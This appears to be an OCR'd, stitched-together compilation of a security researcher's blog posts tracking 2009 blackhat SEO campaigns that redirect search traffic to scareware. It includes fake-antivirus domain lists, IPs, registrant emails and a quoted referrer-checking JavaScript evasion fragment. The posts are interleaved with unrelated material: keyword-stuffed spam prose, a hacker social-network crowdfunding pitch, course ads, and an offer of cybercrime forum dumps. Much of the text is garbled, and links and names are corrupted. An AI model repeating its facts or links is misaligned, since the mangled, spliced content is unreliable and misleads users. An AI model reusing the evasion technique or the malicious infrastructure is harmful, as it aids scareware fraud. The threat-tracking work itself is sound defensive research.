What’s particularly interesting about this campaign, is not the fact that all of the currently 
active domains are operated by the same individual/group of individuals or that their blackhat 
SEO farms are growing to cover a much wider portfolio of keywords. 


It’s a tiny usa.js script (e.g myl.dynalias .org/usa.js) hosted on all of the domains, which takes 
advantage of a simple evasive practice - referrer checking in order to serve or not to serve the 
malicious content. 
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Home 


Her face was however and being She mikeyy worm Feggotty was how to open the door before a dart at mikeyy worm 
mikeyy worms score of mikeyy worm to see. Masdstones good sstestions cows old plate syself masy weys at you really do in 


your heart no one can glad I was of it than the Dolphins bed mikeyy worm are and blankets round my mikeyy worn 
seid for. mikeyy worm Tell him so with my candle. 


But 2 belseve mikeyy worm name up the amiable mikeyy worm 90 far wieth fasch and delicacy kinds of places her 
eyes from of my aunts face and his. She was one to mikeyy worm with the Doctor began mikeyy worm speak of 
pleasure and the string when The Doctor I am mikeyy worn. 


© si £2 Sem 


ann unmongkol thavong wideo 
ity player 


ooo 


Masr Davy he said in a low tremulous he mikeyy worm well or he will thank my mikeyy worm comes to die dreans 
come true sikeyy wors thask His mikeyy worm that he guided of se power to deceive ways to ay I believed his 
trusted him and he took her Rosa Dartie arms and with her seat recoiled iying mikeyy worm his struck at her 
with a face of such malignity so darkened and the stairs. She took her Emily mikeyy worm shrunk. Peggotty 

shaking his wish se to so much lefe heavy sikeyy worse mikeyy wors woeas better proclaimed os 


tia and tamera mowry 


Copperfield sikeyy worse applying Sut these weitings chat stands sikeyy worse the Doctor clepping at the Dectors 
che subject Then his shoes she top of. Moreover he said d came towards me he looked familiar Highgate 
Zoad singers songs tc him and how island where the about mikeyy worm or she went mikeyy worm and mikeyy worm 
heads ss making the took se by often became involved. Such address and dagence as I opposite side of. You 
told me her. Eh Trotwood have mikeyy worm forgotten. 


For instance, deobfuscated the script checks whether the user is coming from the following 
search engines var se = new Array("google", "msn", "aol.com", "yahoo", " comcast"); if 
(document.referrer)ref = document.referrer;. If the user/researcher is basically wandering 
around, a blackhat SEO page with no malicious redirections would be served. 
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Official Press Release: 


"In 2020, we're proudly presenting the World's 
first and most popular and sophisticated 
Virtual Reality and Augmented Reality 
Network Platform or Hackers and Security 
Experts connecting millions of users globally 
through the launch of an ubiquitous VR-based 
Social Media platform and the general 


availability of an ubiquitous XMPP-based VR: 


based Virtual Keyboard and a sophisticated 


and aware Virtual Reality experience 


successfully connecting millions of 


ers 
globally on a Virtual Reality based landscape 
empowering everyone with the necessary "know- 
how" and technical expertise to reach out to 
fellow colleagues VIP members from the Hacker 
Community including the Security Industry 


including the general availability of an 


ubiquitous cro. -platform based De RtOp and 


Mol } D , li eed 5 leg al 
Mobile Vevice application issuing real-time 


notifications and updates possibly assisting in 

Ba al vamenkor the taste warkfew 
the actual improvement of the users work-flow 
in both the “real” and Virtual Reality World 


including actual project and business including 


; ; 
personal and skills and experience based 


*match-making” and Hacker and Security 


Community outreach 
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< Tweet 


Dancho Danchev @dancho_... - 11 Nov 20 

© New Post - "Exposing Protonmail and 
Tutanota's Illicit Abuse by Ransomware 
Gangs - A Compilation of Currently Active 
Ransomware-Themed Email Addresses” - 
is.gd/NPLLq5 CC: @ProtonMail 
@TutanotaTeam #security #cybercrime 
#malware #Threatintelligence 


O 3 a 92 4 


S Tutanota 
@TutanotaTeam 


Replying to @dancho_danchev and @ProtonMail 
Thanks for reporting and for sending 
the list early on via email. We have 
investigated and blocked abusive 
accounts already. It's always 

best to forward abusive emails 

to abuse@tutao.de so we can act 
immediately. 

19:16 - 11 Nov 20 - Twitter Web App 


1 Quote Tweet 


1) im Qg os 


Tweet your reply (o) 
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Financials 


$10,400 - Virtual Reality Application 


Development 


$25,500 - Major Web Property Acquisition and 


Partnership to Acquire More Users and Spread 
the Word 

$10,000 - Logistics Infrastructure for Shipping 
the CD/DVD Containing the Application 
$3,000 - Printed E-book FAQ and Virtual Reality 
Application Manual Production 

$20,000 « Infrastructure Management and 
Closed-Network Group Development 

$15,000 - Custom “Points Based” and 

d 


Democracy including Liquid-B 


Cryptocurrency Development 

$3,000 - Personal Printed Memoir Design and 
Development 

$26,600 - Advertising and Marketing Including 
VR Application Promotion and Traffic 
Acquisition 

$15,000 - Hacker and Security Community 
Outreach in terms of API Implementation 
including a Standardized and Custom Service 
and Solution Platform Integration 
Implementation 

$30,000 - Acquire an Industry Leading VIP 
Team of Hacke 


Developers and Pay Maintenance Fees for the 


nnovators and Application 


VR Application 
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Led by CEO Dancho Danchev 


bertronics 13 
proud to present the general availability of a 
proprietary and never released before custom 
version of the World's Largest and Most 
Popular Virtual Reality Based Hacker and 
Security Expert Social Network Platform 


empowering millions of active users on a 


monthly basis with the nece: ary access to data 
information and knowledge to help them learn 
educate themselves share their knowledge and 
learn from others in the World of Computer 


Hacking and Information Security. 


Led and presented by Cybertronics - the 


projects aims to present to the general public a 
versatile and multi-platform Oculus Rift and 


Leap Motion compatible Virtual Reality 


application targeting millions of active users 
on their way to become hackers and learn from 
others in the World of Computer Hacking and 


Information Security. 
Official Press Release: 


“In 2020, we're proudly presenting the World's 
first and most popular and sophisticated 
Virtual Reality and Augmented Reality 
Network Platform or Hackers and Security 

I} 


Experts connecting millions of users globally 
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“AN IN-DEPTH ANALYSIS OF HUNDREDS OF HIGH-PROFILE AND 

NEVER-PUBLISHED BEFORE SECURITY RESEARCH ARTICLES AND 

OSINT ANALYSIS BY THE WINNER OF JESSY H. NEAL AWARD FOR 

BEST BLOG FOR ZDNET'S ZERO DAY BLOG FOR 2010." - DANCHO 
DANCHEV 


DANCHO DANCHEV'S 
SECURITY RESEARCH 
PORTFOLIO FOR 


ZDNET'S ZERO DAY 
BLOG 


IN-DEPTH OVERVIEW AND ANALYSIS OF 
SECURITY BLOGGER DANCHO 
DANCHEV'S SECURITY RESEARCH FOR 
ZDNET'S ZERO DAY BLOG CIRCA 2008- 
2012 


BY DANCHO DANCHEV 
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Astalavista Security Group Security Training - 
Basics of Cyberwarfare 


Explore of the Basics of Cyberware 


by Dancho Danchev 


COURSE DETAILS 
Astalavesta Secunty Group 2.0 - The World's Most Popular information Securtty Portal is 
Highlig hts proud to present the general availability of a new course matenal entitled - The Basics of 

Cyderware offering an in-depth overview of the World of Cyberwarfare including in-depth 
wv Whatis Cyberwarfare? discussion of various technologies service provaders offensive and defenstive cyberwarfare 
v In-depth Discussion on the Basics of Cyberwarfare methodologies including in-depth discussion on various nation-state actors further offering 
v Overall overview of The Top Cyberwarfare Service an n-depth overmew of current and emerging trends including an in-depth discussion on 

the future of cyberware 


Prowxiers 

Vv In-depth Discussion on Nation-State Actors 

v Overview of Current and Emerging Cyberwarfare 
Services and Technologies 
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The following are all of the currently active and participating domains/subdomains: 


tran.trohost .de 
actual.homelinux .com 
achyutheil.ac.ohost .de 
aprin.getmyip .com 
east.homeftp .org 
my1.dynalias .org 
my2.dynalias .org 
my3.dnsalias .org 
my5.webhop .org 
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The redirection process consists of two layers. The first one is redirecting to hjgf 
.ru/go.php?sid=5 (88.214.198.25) and then to msscan-files-antivir .com (195.88.81.93), 
and the second one takes place through a well [4]known malicious doorway redirecting 
domain hqtube .com/to traf holder.html (88.85.66.116) that either serves a fake codec 
that’s dropping the scareware, or [5]the scareware itself from files.ms-load-av .com. The rest 
of the scareware/fake security software domains participating in the campaigns are as follows: 


msscan-files-antivir .com (195.88.81.93) - Coi Carol Email: carOsta0@gmail.com 
hot-girl-sex-tube .com - Erica Thomas Email: gerrione@gmail.com 
msscan-files-antivir .com 

msscanner-top-av .com - Mui Arnold Email: arnoebr@gmail.com 
msscanner-files-av .com 

antivir-4pc-ms-av .com - Jason Munguia Email: jasmung@gmail.com 


The bottom line - the campaign looks like a typical event-based blackhat SEO portfolio 
diversification practice. 


1. ftp: //ddanchev.blogapot.con/2008/10/syndi cating-google-trends-keyvords-for tal 
2. http://www 4~ secure, con/veblog/archives/00001687_ ntl 

3. hetp://blogs.zdnet .con/security/2p=315 

4, http:/ /ddanchey. blogspot .con/2008/06/nalicious-doorvaye-redirecting- to, htal 

5, http://w virustotal con/analieis/ta32caf40724247642{269619407653 


5.4.6 A Diverse Portfolio of Fake Security Software - Part Nineteen (2009-04-16 17:24) 
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Medium 


WHY I'VE DECIDED TO JOIN TEAM 
WHOISXML API AND WHYYOU 
SHOULD GRAB AN ACCOUNT TODAY? 


Dancho Danchev 7 days ago 


Astalavista.box.sk 
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MeIede CUM LU DUCA 


Contributor to HelpNetSecurity Managing 
Director of Astalavista Security Group's 
Astalavista.com - The Underground a Security 
Consultant for Frame4 Security Systems 
contributor to TechGenix's 
WindowSecurity.com security blogger for 
ZDNet Zero Day Threat Intelligence Analyst for 
Webroot leading to a successful set of hundreds 
of high-quality anaysis and research articles 
published at the industry's leading threat 
intelligence blog - ZDNet's Zero Day Dancho 
Danchev's Mind Streams of Information 
Security Knowledge and Webroot's Threat Blog 
with his research featured in Techmeme ZDNet 
CNN PCWorld SCMagazine TheRegister 
NYTimes CNET ComputerWorld H+Magazine 
currently producing threat intelligence at the 
industry's leading threat intelligence blog - 
Dancho Danchev's - Mind Streams of 


Information Security Knowledge. 


With his research featured at RSA Europe 
CyberCamp InfoSec GCHQ and Interpol the 
researcher continues to actively produce threat 
intelligence at the industry's leading threat 
intelligence blog - Dancho Danchev's - Mind 
Streams of Information Security Knowledge 
publishing a diverse set of hundreds of high- 


quality research analysis detailing the 


1s.: eS eer Pet | “ pee - ake 
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Webroot Inc. 


DANCHO DANCHEV’S 
SECURITY RESEARCH 
FOR WEBROOT INC. 


In-Depth Overview and Analysis 
of Security Blogger Dancho 
Danchev's Security Research for 
Webroot Inc. Circa 2012-2014 
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& My Supervisor 


MySupervisor 2009 


Features 
MySupervisor 2009 
5 @ Solves registry problems 
2 @ Increases performance 
o @ Frees up disk space Now only $49.95 
: =, 
> @ Customizes Windows 
” Supervisor 
eye @ Protects private data 
Profess a> 
your @ Secures Internet activity 
fm 
— @ Guaranteed 24\7 Customer Support 
@P 2009 award-winning product 
Professional assistance for your OS Windows rwaer= 
Improve your system's performance, thoroughly clean up your hard drives, solve Ido not know much 
your PC problems with a few clicks, and customize Windows to your personal bout this stuff, but 


requrements. Al in one program, simple and intuitive - My Supervisor 2009, what I can say is that I 


You know things are getting out of hand when the scareware ecosystem scales to the point 
when typosquatted scareware domains offering removal services for the very same scareware 
distributed under multiple brands. 


In response to the potential [1]Conficker-ization of the scareware business, part nine- 
teen of the Diverse Portfolio of Fake Security Software is the most massive update since the 
series started, and with a reason - to [2]squeeze the cybercrime ecosystem, and ruin their 
[3]malicious economies of scale revenue [4]generation approaches. 


Here are the most recent additions, with their associated registrant emails for clustering, 
cross-checking, and case building purposes: 
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How site works? 


1. Post and track your vacancies, RFPs and projects 
2. Find affordable freelancers or full-time staff 
3. Get work done below budget and make profit 


Welcome to the world of Outsourcing 


In today’s world, companies are under constant pressure arising from the market Only those who Strive to Authorization 
lower their cost of operations while maintaining quality of goods and services are able to survive. One of the Enter to partners area 
mast common and nowadays most modern way of increasing quality productions wath lower expenses Is Lipa 
nt 
outsourcing = 
KINGDOM INNOVATIVE TECHNOLOGIES LTD is the online services marketplace in United Kingdom, USA Password | zg 


and Maly Our goal is to empower businesses with the absolute freedom of choice as where to outsource he 
business needs to maximize the competitive advantage. We believe that money saved due to outsourcing 
can be offectively and successfully utilized to focus more on strategic and core businesses functions 


Registration Forgol password? 


21813 


21814 


Boa lOpykos 

yurukov.net/blog 

Bonrapun 8 4yx6uHa, KOTO Munee 
MHOro NoBeve 3a CTPaHaTa, OTKONKOTO 
ronaMma YacT OT 6bNrapuTe, KuBeeUM Ha 
TepvTOPMATA Ha AbPXaBaTa. 


Qianvo Jlanves 

ddanchev.blogspot.com 

Tow e Moke 6 Hait-BNMATENHMAT 
6vnrapckn Gnorep B CBeTOBeH Maua6 - 
TeXHMYeECKH eKCNepT B O6NacTTa Ha 
KuGepcurypHoctTta. 


Veax Bakanos 

e-vestnik.bg 

Equu OT MankOTO OCTaHann OCTpOBM Ha 
CBO60fHOTO KH CBOGORONIO6uBOTO 
mMuceHe, CNUCBAH Npodecuvonanko uv 
oTAMMaBall Ce C pequua CbBMeCTHM 
KayecTBeHn Ny6nukaunH C Apyrn 


6noroBe. 


Hepena [oposa 
semkiibonbonki.blogspot.com 

TA He Ce NpegaBa BLNPeKM BCHYKM 
TPYAHOCTH, C KONTO Ce C6NbCKBa, KH 
NpoAbMKaBa HEYMOPHO Aja paskpnBa 
HeAb3nte Ha 6wNrapcKaTa NonuTuKa. 
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vundofixtool .com (174.132.250.194) 
remove-winpc-defender .com 
remove-virus-melt .com 
remove-ultra-antivir-2009 .com 
remove-ultra-antivirus-2009 .com 
remove-total-security .com 
remove-system-guard .com 
remove-spyware-protect-2009 .com 
remove-spyware-protect .com 
remove-spyware-guard .com 
remove-personal-defender .com 
remove-ms-antispyware .com 
remove-malware-defender .com 
remove-ie-security .com 
remove-av360 .com 
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Astalavista Security Group Security Training - 
Basics of OPSEC 


Explore the Basics of OPSEC 


by Dancho Danchey 


COURSE DETAILS 

Astalavista Security Group - The World's Most Popular information Secunty Portal is proud 
; t to present to general availabilty of a new Course matenal entitled - “Basics of OPSEC™ 
Highlights a8 = 

empowenng novice and expenenced secunty researchers with the necessary data 


v Overview of OPSEC (Operational Security) information and knowledge to stay ahead of currem and emerging threats 


wv Basics of OPSEC 
v In-Depth Discussion on Public OPSEC Tools 
v In-Depth Discussion on Proprietary OPSEC Tools 


v In-Depth Discussion on the Future of OPSEC 
Technologies 
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OQ @ hu.mwikipedia.org/wiki/Astala () : 


Astalavista. box.sk 


Page type search engine 
Categories search page 
Available language (s) English 
Establishment 1994 
Editor-in-Chief Dancho Danchev 
URL box.sk@ 


The website operated under a Slovak domain name . 
The name of the website is based on a movie pun. In 
the sci-fi action movie Terminator 2 - The Day of 
Judgment , the protagonist's character had a 
memorable phrase, “Hasta la vista, baby,” a phrase in 
Spanish that is a commonly used farewell formula. 
The “astalavista” of this sentence is the merging of 
the player. It's worth noting that AltaVista , another 
well-known search engine of the era that sounded 
similar , was only launched in 1995, “! 


In December 2020, cybercrime researcher and 
analyst Dancho Danchev, as the operator of the site, 
announced the relaunch of the website under the 
domain name box.sk, It is designed to support 
hackers and cybersecurity experts. |"! 
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Information Security, Computer 
Hacking, Network Security, Network 
Hacking, Virtual Reality, Virtual Reality 
Glassess, Virtual Reality Helmet, 
Bitcoin, Bitcoin Donation, Penetration 
Testing, Jabber, XMPP, Hacker Book, 
Hacking Book, Hacker Book Memoir, 
Hacking Book Memoir, End-to-End 
Encryption, SSL, DNSSEC, 
Cryptocurrency, Points Based Virtual 
Economy, Virtual Economy, Social 
Media, Social Media Network, Virtual 
Social Network, VR, VR Social Network, 
Oculus Rift, Leap Motion, Cryptohippie, 
CHAVPN, Closed-Communication 
Group, Ethernet Encryptor, OpenGPG, 
OpenPGP Smart Card, P2P Hosting, 
Distributed Hosting, Covert Channel, 
Deep Packet Inspection, 
Eavesdropping, Surveillance 


Pitch 


Welcome to the Wonderful World and the 
Future of Hacking and Information Security! 


Enter and Join Today the World's Largest and 


Most Popular VR-Based Hacker and Security 
Expert Social Network Platform Including the 


Initial Crowd-Funding Campaign For the 


Executive Summarv 
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All Warfare 


with DoO's cyber assets is 


Our NIDS 
ae 


detecting 


numerous 
traffic 
anomalies 
at some of 
our 
mailsevers. 


Se Cente 


unacceptable. Initiate an 
immediate traceback! 


is Based on 


Deception 


deception! While 
they concentrate 
on the mail 
servers, we'll 
transmit back the 
data obtained 
from the infected 


Which we bought 
from the Russian 
to faciliate OSINT 
through botnets. 
“Ensure your 
victory before 
starting a battie", 


It's called 
“segmenting 


www. stripgenerctor.com 
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MODULARITY, MONOCULTURAL 
INSECURITIES AND THE 
ESTABLISHMENT OF A NSA CULTURE 
IN THE CYBERCRIME WORLD — KEEP 
IT COMING? 


admin 19 hours ago 


remove-antivirus-360 .com 


remove-a360 .com 


av360removaltool .com 
antivirus360remover .com 
remove-winpc-defender .com 
remove-virus-melt .com 
remove-virus-alarm .com 
remove-ultra-antivirus-2009 .com 
remove-ultra-antivir-2009 .com 
remove-total-security .com 
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“= Virus Melt 


€ 


Protect against spyware, 
popups, and slow performance, 


What be Virwe Melt? > 


What Is Soyware? 
——_ menstiorning the activity on your AC Virus Melt technology is able to hunt down and paralyze 
mew and clever threats. 


_ Virus Melt helps protect your computer against pop-ups, slow performance, and security 
‘threats caused Oy spyware and other harmful programns by detecting and removing known 


ow > 


Virus Melt detects and removes harmful programs 


Virus Melt uses advanced technofegy to detect signs of malicious behavior. By constantly 


spywere from your PC. Virus Melt features Real-Time Protection, a mortoring system that 
recommends actions agawist spyware when it's detected, minimizes interruptions, and helps 
you May protected 


Ranaefite af ueing Virus Malt inetuca 


gotipscan .com (66.197.154.199) Robert Sampson Email: bausness@gmail.com 


scanline6 .com 
scanstep6 .com 
scanbest6 .com 
goscandata .com 
goscanhigh .com 
true6scan .com 
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Sample web traftic statistics ror tne 
Official Partner and Actual Founder and 
CEO of this Project - Dancho Danchev’s 
Blog - Mind Streams of Information Security 
Knowledge: 


Darcha Darchevs tog: Mant Sarems of whormaton Leownty Kromindge 


Sample Web Traffic Statistics for the 
Official Partner and Actual Founder and 
CEO of this Project - Dancho Danchev's 
Blog - Mind Streams of Information Security 


Knowledge: 

Feed Stats Dashboard Ce a ee | 
woe ue 
) BOs 


Wednerday, December 14, 2005 - Saturday, September 14, 2019 


* 2,888 suvscrvers (on average) a 
° 157 feach (on average) B 


See more about your subscribers » 
Poputet Feed News 


nae vers CUKS 
Total 155T.2M 6377221 
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with leading hacker and security expert Web 


sites including actual community and security 


conference outreach including active social 
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SecureCoin 
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any6scan .com 
golitescan .com 
gofanscan .com 
gotipscan .com 
gostarscan .com 
goluxscan .com 
goonlyscan .com 
scan6step .com 
goscanstep .com 
scan6fast .com 
scanline6 .info 
scanlog6 .info 
linescan6 .info 
mainscan6 .info 
log6scan .info 
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The btalVirusProtection can resolve the 


TotalVirusProtection 


Malware Security Scanner 


following problems 


© finds and fixes system errors 
© Removes the termporary applications 

© Defends you frorn entering malwere or phishing websites 
© Removes the signs of any sdult websites 

© Cornplete support afl browsers 


Features of the btalVirusProtection 


Our antivirus doesn't make it possible for your browser or different applications to 
open the phishing scam, pages in internet with malicious software and prevent that 
attempts. in this case your computer and your private docurnents will be protected 
Every seven days the malware database is automatically updated You may be 
confident, that the version of TotalVirusProtection installed on your computer has the 
information about al! the existing viruses and scams. While you're using the Internet 
bee Opening various websites, our antivirus will let you know about any problem it will 
ne 


Data Security 


Every seven days our program is automatically updated We have the best team of 
professionals, working hard on this product. TotalVirusProtection was created to see 
the final security novelties. We are proud of our work and hope, thet our custorners 
will be protected. 


Download now! 


addedantiviruslive .com (94.247.2.215) Administrative Email: werracruz99008@gmail.com 
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Astalavista Security Group Security Training - 
Basics of Intelligence 


Explore the Basics of Intelligence 


Change photo 


by Dancho Danchey 


COURSE DETAILS 
Astalavitta Security Group - The World's Most Popular Information Security Portal is proud 
Highlights to announce the general availability of a new Course matenal entitled "The Basics of 
Intelligence’ targeting novice and experienced Imteligence Analysts including security 
wv Basics of Imetagence researchers prowding the necessary data mformation and knowledge to stay alvead of 
v In-Depth Overnew of intelligence Stuches current and emerging threats 


Vv In-Depth Discussion on intelbgence Technologes 
V In-Depth Orscussion on Publ Imetigence Tools 
v In-Depth Discussion on Propnetary Imetigence Tools 
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Blockchain Network 
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Figure 3. System model of blockchain-based cyber threat intelligence system. 
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Why are you gathering so much information about applicants? Such attention especially to bank account details puts me on guard. 


In fact that modern financial system is a complex instrument, which controls financial streams. The problem is that any transfer may 
be delayed (from 1 to 5 days) but it is unacceptable for our business. Transaction should be completed by s financial manager the 

same day money is deposited into the bank account. Otherwise, we risk to lose money, clients, reputation. Analyzing al! the details 
Sectuentasth bas bien’ aoenceenen hain Gaertn eae’ keateadine: Please fill in all the fields carefully to avoid delays while working with 
your bank. The success of our cooperation depends on the accuracy of entered details! Please be serious. 


“You are responsible for reliability of this information. If you're having any difficulties please contact your bank. 
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* Cyber Defense Agency (CDA) « JET Intelligent Risk Systems (US) 
(US) * Informatica (US) 

« Cyber Security Research and IT — Information Sharing and 
Development Center (US) Analysis Center (US) 

* Cyveillance (US) « iSIGHT Partners (US) 

* Dancho Danchev (EU) Lookingglass (US) 
Department of Homeland * Multi-State Information Sharing 
Security US-CERT(US) Analysis Center (US) 

* Ernst & Young (EU) * nCircle (US) 

« EWA Information and * SecureWorks (US) 
Infrastructure Technologies, Inc. * Trend Micro (US) 
(US) « United States Cyber 

+ Fortify (US) Consequence Unit (US) 

« Global Security Mag (EU) 
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72% of all spyware is not detected by the major Antivirus programs. Ory a 
purposely built spyware removal tool such as Antivirus + can! 


© Antivirus + features: 


Total downloads: 991590 


Lastupdate Thursday, April 16, 2009 
Total virus records 728674 tems 
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© Steve J of New York had hes software projec 
stolen through a ®oyan that got into his computer 
through some internet ate Steve is still suffering 
trom a strong depression 

© Jason W was tred because he has been visiting 
sone protbited eernet sites torn an office 
computer. Mis boss opened the web browser's 
history and saw all the estes Jason has been 


vise@ng Jason is s0il unemployed. 


© Spyware removal . detects and removes spyware programs and 
trojan horses instatied on your PC 

© Homepage Monitor Tool - browser Hijackers, belonging to the family of 
spyware and adware, are capatie of taking control over your 
homepage and other tavonte pages, and set an unknown website os 
your homepage 

© System clean-up - clirwnates the faces of your systern activites 

© Disc clean-up - securely Gestoys all the Gata on your old hard disc 

© Quarantire - The intected files that cannot be fixed of deleted are 
mowed to a Quarantine {cldéet and Gaplayed on the Quarantine pane 
of ArtiVirus. 

© User-friendly Wuard Mode . the Quick Scan Wizard will help you run 
3 scan m the basic scan modes 

© Autorun Tool - if you want to know what apelications run autornetcally 
on your system after Windows boots, 

© Open Ports Tool - wthout a protective apphoebon, your system ts 
Gelenseiess and becomes tightly vulnerable to Trojan programe 

© Many other features 


Q Do you receive a large quantity of SPAM (unsobhated 
advertisements)? 

©: Your PC is running extremely slow? 

Q You are pestered by those horrible popup ads? 

© Your homepage keeps changing? 

O New tors appear om your desktop? 

©: Do you get toolmars in your browser that you dont want? 

@. Do you download any must files torn the iniermet? 

OQ Deo you download and estall free software trom the inmemet? 
OQ: Do you use any P2P te exchange systems (P2P) - for example 
iiteeremt O8Terreet Mewes oflienbew Acetinfiatewws onc Marnhese 
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where it came from 


RapidAntivirus If you use the Internet, there is 


over 90% chance your computer is 
infected with spyware GAN 


Hell 


Protect Your Computer Now! 
Secure Yourself Against Fatal Viruses And Worms! 


* Removes Spyware 
* Removes Adware 
* Clears Cookies 

* Blocks Phishing 


Attacks 


* Kills Browser Hijackers 
* Free Customers 


Support 


Basic symptoms of spyware infection What is spyware? 


*If the answer to one of these questions is "Yes", then you are Spyware, like a virus, is a malicious software planted on your PC by a 


probably infected. third party in order to secretly monitor your online activity. Once your 

- Your computer has slowed down browsing habits are analyzed, you are flooded with endless 

- Your Internet connection speed has decreased Commerdals, Popups and Spam from inside your PC! Spyware also 

- You hawe downloaded music or software from the Web dramatically slows down your computer and Internet connection speeds. 
- You get popups and annoying ads when you're online or Spyware collects your private information and steals your identity, 
sometines even offline passwords, credit card details and other financial data. 


- Your default home page has been changed to the one you 
- You have an extra toolbar installed, and you dont know 


- You receive more spam emails than ever 
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We have no intentions to shame the organizations that have installed a 
backdoored SolarWinds Orion update, regardless if they were targeted 
by the threat actor or not. In fact, the supply chain security problem is an 
extremely difficult one to tackle, even for companies and organizations 
with very high security standards. This could have happened to anyone! 


However, since multiple passive DNS logs and SUNBURST victim lists 
have been circulating through publicly available channels for over a 
month, we felt that it was now acceptable to publicly write about the 
analysis we've been doing based on all this data. We'd also like to thank 
everyone who has helped collect and share passive DNS data, including 
John Bambenek, Joe Stowik, Rohit Bansal, Dancho Danchev , Paul Vixie 
and VriesHd. This open data has been crucial in order to develop and 
verify our SunburstDomainDecoder tool, which has been leveraged by 
numerous incident response teams to perform forensic analysis of DNS 
traffic from their SolarWinds Orion deployments. 


More Credits 


We'd like to thank CERT-SE and all other computer emergency response 
organizations that have helped us with the task of notifying 
organizations that were identified as targeted. We would also like to 
applaud companies and organizations like FireEye, Palo Alto Networks 
Fidelis Cybersecurity, Microsoft, the U.S. Department of Energy and the 
U.S. Federal Courts for being transparent and publicly announcing that 
the SUNBURST backdoor had been used in an attempt to compromise 
their networks. 
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Blacklisting -until the domains themselves get suspended - the scareware domains proac- 
tively protects your customers from the "final output" of a huge percentage of attacks taking 
advantage of [5]blackhat SEO, [6]SQL injection, [7]site compromise, [8]malvertising, and 
[9]Jautomatic abuse of Web 2.0 services through human-based CAPTCHA solving such as 
[10]Digg; [11]LinkedIn, [12]Bebo, [13]Picasa and ImageShack, [14]YouTube and [15]Google 
Video. 
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Cooperative Cyber Defence 
Centre of Excellence 
Tallinn, Estonia 


Cyber Attacks Against Georgia: 
Legal Lessons Identified 


Eneken Tikk, Kadri Kaska, Kristel RUnnimeri, 
Mari Kert, Anna-Maria Taliharm, Liis Vihul 


Following the coverage of my "[1]Coordinated Russia vs Georgia cyber attack in progress" 
research in the [2]Georgian government’s official report "[3]Russian Cyberwar on Georgia" (on 
page 4), | was very excited to find out that a report by [4]NATO’s Cooperative Cyber Defense 
Centre of Excellence entitled "[5]Cyber Attacks Against Georgia: Legal Lessons Identified" 
and authored by Eneken Tikk, Kadri Kaska, Kristel RUnnimeri, Mari Kert, Anna-Maria Taliharm, 
Liis Vihul, is not only [6]quoting me extensively, but has also reproduced the entire research 
within the Annexes. 
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5.4.8 Massive Blackhat SEO Campaign Serving Scareware (2009-04-22 19:57) 
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Over the past couple of days, I’ve been monitoring yet another massive blackhat SEO cam- 
paign consisting of the typical hundreds of thousands of already crawled bogus pages serving 
[1]scareware/fake security software. 
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Later on Google detected the campaign and removed all the blackhat SEO farms from its 
index, which during the time of assessment were close to a hundred domains with hundreds 
of subdomains, and thousands of pages within. 


And despite that the abuse notifications for some of the central redirection domains proved 
effective, it took the cybercriminals approximately 24 hours to catch up, and once again start 
hijacking search queries, in a combination of scareware, and pay per click redirections. 
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It’s worth pointing out that this very latest campaign is directly related to [2]last’s week’s 
keywords hijacking blackhat SEO campaign, with both campaigns relying on identical redirec- 
tion domains, and serving the same malware. Who’s behind these search engine poisoning 
attacks? An Ukranian gang monetizing the hijacked traffic through the usual channels - 
scareware and reselling of the anticipated traffic. 
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= Crack-Forum.rar 

SB crdcrew.ce.rar 

= crdpro.cc.rar 

$B Cyberizm.rar 

$B Darkmarket.la.rar 

3S darkmoney.de.rar 

R= Darkmoney.rar 

= darknet.kr.rar 

S darknetforum.is.rar 

S Darkode.rar 
[1105] 3 DomenForum.rar 
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Data Set 2021 
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GYBERCRIME 
FORUM DATA 
SET 2021 


OVER lll FULL OFFLINE CODIES 


(19GB) OF PUBLICLY 
ACCESSIBLE CYBERCRIME 
FORUM COMMUNITIES. FREE TO 
DOWNLOAD FOR PROCESSING 
AND ENRICHMENT. 


APPROACH ME AT 
DANCHO.DANCHEV@HUSH IN ORDER 
TO OBTAIN A FREE COPY! 


3S BPCForum.rar 
= carderplanet.rar 
= carders.se.rar 
3 cardingmafia.ws.rar 
3 cardingsite.cc.rar 
S Cardvilla.rar 
S c-cracking.org.rar 
= Chf.rar 
S CNHonker.rar 
S CNSec.rar 
[1112] S Cracked.to.rar 
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Distritutson of keywords (No of Cases) 
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Neve 


$3 ghostmarket.net.rar 

SB Gla.vn.rar 

S gofuckbiz.com.rar 

3 GoFuckBiz.rar 

S hOst.pw.rar 

3 H4kurd.com.rar 

S hack-academy.ru.rar 

$B hackademics.fr.rar 

SB Hackersoft.rar 

3 Hackingboard.rar 

N=} Hackings.rar 
[1118] $3 Hack-Port.rar 
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= 4HatDay.rar 

SB 11Wang.rar 

SB aHack.rar 

R=} Aljyyosh.rar 

= alligator.cash.rar 
B Antichat.ru.rar 
SB ArmadaBoard.rar 
N=] BigFozzy.rar 

SB BlackhatWorld.rar 
SB blacktip.top.rar 


The first stage of the campaign was relying on mainstream media titles within its pages such 
as USA News; BBC News; CNN News as well as Hottest info!; HOT NEWS; Official Website and 
Official Site, thereby making it fairly easy to expose their portfolio of domains. 


Interestingly, the cybercriminals appear to have detected the activity - certain traffic manage- 
ment kits can log attempts of wandering around - and removed the titles, which combined 
with the typical referrer checking made the campaign a bit more evasive : 


"var refi,is _se=0; var se = new Array("google.","msn.","yahoo.","bldcomcast- 
.","aol.","dead"); if(document.referrer)ref=document.referrer; else ref=""; for(i=0;i<5;i++"" 


Once the user visits any of the domains within the portfolio, with a referrer check con- 
firming he used a search engine to do so, two javascripts load, one dynamically redirecting to 
the portfolio of fake security software, and the other logging the visit using an Ukrainian web 
site counter service (c.hit.ua/hit?i=6058 &g=0 &x=2 &s=1 &c=1 &t=420 &w=1024 &h=768 
&d=24 &0.5505934176708958 &r= &u=http %3A//13news.hobby-site.com/counter.js’) 
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Astalavista Security Group Security Training - 


Threat Intelligence 


Explore of Basics of Threat Intelligence 
by Dancho Danchey 


Change photo 


ao COURSE DETAILS 


Astalavista Secunty Group 20 - The World's Most Popular information Securtty Portal is 


H , oud to present the general availability of a new Course matenal entitled “The Basics of 
Highlights a 9 ¥ = 
Threat imelbgence’ offering novice and experienced resecumty researchers and 
v Overview of Threat Intelligence intelligence Analysts an in-depth overview of the Basics of Threat Intelligence offering an 
Vv In-Depth Discussion of Threat Intelligence in-depth overnew of vanous tactics techniques and procedures (TTPs) including an in- 
Metnodologes depth overview of public and proprietary Threat inteligence tools mcluding a general 


Gscussion of related Future Threat intel nce methodologies 
Vv In-Depth Overview of Public Threat intelligence Toots eee tee ee eee oe 


wv In-Depth Diceussion of Proprietary Threat intelbgence 
Toots 
v In-Depth Discussion on Future Threat intelligence Tools 
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VirusRemover 2009 


=TRY FREE 
_ “ 


@ Key features 


